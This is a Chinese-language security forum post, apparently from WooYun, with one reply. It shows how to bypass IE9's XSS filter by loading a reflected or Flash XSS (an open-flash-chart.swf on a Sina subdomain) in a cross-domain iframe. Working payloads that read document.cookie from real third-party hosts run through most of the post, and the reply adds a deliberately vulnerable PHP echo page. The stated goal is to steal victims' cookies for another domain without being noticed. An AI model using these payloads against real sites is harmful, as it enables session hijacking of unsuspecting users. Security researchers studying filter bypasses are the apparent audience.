http://zone.wooyun.org/content/368
昨天在測試WEBQQ的時候,利用了這個,回頭又在本地測試了一下。
----------------------------------------------------
在本地 localhost建一個頁面,進行了以下測試。
通過iframe調用傳統的反射型XSS,因爲iframe頁面不同域,被IE9過濾器過濾掉,不執行。
<code>
<iframe/src="http://xsst.sinaapp.com/example/1-1.php?page=<script>alert(document.cookie)</script>">
</code>
如果用普通的embed來嵌入FLASH的話,則彈出的是 localhost,即當前測試網頁的cookies
IE下測試:chrome會崩潰.
<code>
<embed/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"allowscriptaccess="always"></embed>
</code>
但是用iframe來嵌入FLASH XSS的話,就有意思了
測試代碼如下(IE):
<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){location.href=%22javascript:'<script>alert(document.cookie)</script>'%22})()"></iframe>
在chrome中,可能會導致瀏覽器崩潰,可以改用以下代碼。
<iframe/src="http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data=(function(){alert(document.cookie)})()"></iframe>
運行你會發現,彈出的是新浪域的cookies~
------------------------------------------
因此當我們發現 www.A.com 域名下的一個flash XSS
我們可以在 www.B.com域名下用iframe嵌入www.A.com的flash XSS文件。
當受害者,打開了www.B.com的域名時,我們可以成功獲取其在www.A.com的cookies數據!
這樣一來,***就變得更加隱蔽啦~
===============================================
laterain 
| 2013-07-23 09:35
測試了一下,發現這個利用的話可以不限於flash,反射型的都行
原理是瀏覽器的xss filter不會過濾頁面本來的代碼
xx.html
<iframe src='http://127.0.0.1/xsstest.php?xss=<script>alert(1)</script>'>
xsstest.php
<?php
$xss = $_GET['xss'];
echo $xss;
?>
訪問xx.html
這樣IE9下彈了,Chrome沒彈,看來Chrome要先進點啊